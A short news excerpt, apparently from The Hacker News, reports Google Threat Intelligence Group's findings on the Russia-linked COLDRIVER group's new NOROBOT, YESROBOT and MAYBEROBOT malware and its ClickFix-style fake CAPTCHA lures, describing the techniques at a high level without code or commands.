"The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following the publication of its LOSTKEYS malware around the same time. While it's currently not known for how long the new malware families have been under development, the tech giant's threat intelligence team said it has not observed a single instance of LOSTKEYS since disclosure."
"The latest attack waves are something of a departure from COLDRIVER's typical modus operandi, which involves targeting high profile individuals in NGOs, policy advisors, and dissidents for credential theft. In contrast, the new activity revolved around leveraging ClickFix-style lures to trick users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt."
Google Threat Intelligence Group observed rapid development of multiple malware families attributed to Russia-linked COLDRIVER since May 2025, indicating increased operations tempo. New malware families are codenamed NOROBOT, YESROBOT, and MAYBEROBOT and form a related delivery-chain collection. Early activity previously used LOSTKEYS, but no instances of LOSTKEYS have been observed since disclosure. Attackers shifted from targeting high-profile NGO figures and dissidents to deploying ClickFix-style HTML lures that coax users to run malicious PowerShell commands via the Windows Run dialog under a fake CAPTCHA. The COLDCOPY lure drops a NOROBOT DLL executed with rundll32.exe to install subsequent payloads. Zscaler tracks NOROBOT and MAYBEROBOT as BAITSWITCH and SIMPLEFIX, respectively.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]